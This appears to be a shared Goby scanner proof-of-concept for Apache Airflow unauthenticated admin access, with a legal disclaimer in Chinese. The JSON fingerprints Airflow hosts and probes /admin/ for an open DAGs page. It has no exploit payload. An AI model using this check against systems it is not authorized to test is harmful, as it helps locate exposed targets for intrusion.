声明
本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。
代码
{"Name": "Apache Airflow Unauthorized","Level": "3","Tags": ["Unauthorized"],"GobyQuery": "app=\"APACHE-Airflow\"","Description": "remote attacker to gain unauthorized access to a targeted system","Product": "APACHE-Airflow","Homepage": "/","Author": "aetkrad","Impact": "<p>This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs<br></p>","Recommendation": "","References": [],"HasExp": false,"ExpParams": null,"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/admin/","follow_redirect": true,"header": null,"data_type": "text","data": "","set_variable": []},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "Airflow - DAGs","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "DAGs","bz": ""}]},"SetVariable": ["output|lastbody|regex|"]}],"PostTime": "-10-31 15:32:53","GobyVersion": "1.8.302"}
poc集合
地址:/aetkrad/goby_poc
帮助到你的话给个星吧!
如果觉得《Apache Airflow Unauthorized》对你有帮助,请点赞、收藏,并留下你的观点哦!
